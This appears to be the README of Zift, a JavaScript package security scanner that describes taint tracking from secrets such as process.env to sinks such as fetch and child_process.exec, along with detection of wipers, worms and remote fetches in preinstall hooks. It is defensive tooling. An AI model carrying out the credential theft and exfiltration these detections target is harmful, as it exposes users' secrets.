The Symbolically-Intelligent Ecosystem Security Engine for JavaScript.
Zift v4.2 is the "Deep Hardening" release, introducing advanced behavioral rules for Wiper detection, Worm prevention, and OS-specific targeting analysis.
- 🧠 Symbolic Taint Analysis: Tracks data through destructuring (
const { key } = process.env) and deep property access (obj.a.b.c). - 🧬 Transformation Tracking: Automatically follows taint through encoding methods like
Buffer.from(data).toString('base64')orhex. - 🐛 Worm & Propagation Defense: Detects the chain of credential theft, data exfiltration, and self-publishing (registry hijacking).
- 🛡️ Deep Behavioral Hardening: Flags wipers (recursive deletions), CI/CD secret theft, and unauthorized module/git tampering.
- 📡 OS Fingerprinting Detection: Identifies system targeting behaviors (os.platform, arch) coupled with network activity.
- 📦 Lifecycle-Specific Intelligence: Detects remote fetches and binary drops occurring during sensitive contexts like
preinstall.
# 1. Install Zift
npm install -g @7nsane/zift
# 2. Setup Secure Wrappers (adds --zift flag to npm/bun/pnpm)
zift setup
# 3. Audit a local project
zift .
# 4. Run your application with Active Shield
zift protect index.jsZift uses a Deterministic AST Analysis engine. Unlike regex-based scanners, Zift understands the structure of your code. It tracks the flow of data from sensitive Sources (like process.env) to dangerous Sinks (like fetch or child_process.exec).
- Collection: Single-pass O(n) traversal.
- Evaluation: Priority-based rule matching.
- Intelligence: Cross-file propagation and VM-based reveal.
| Command | Description |
|---|---|
zift . |
Deep scan of the current directory |
zift install <pkg> |
Pre-audit and install a package securely |
zift protect <app> |
Launch application with Zift Shield runtime auditing |
zift setup |
Configure shell aliases for secure package management |
Build with confidence. Secure with Zift. 🛡️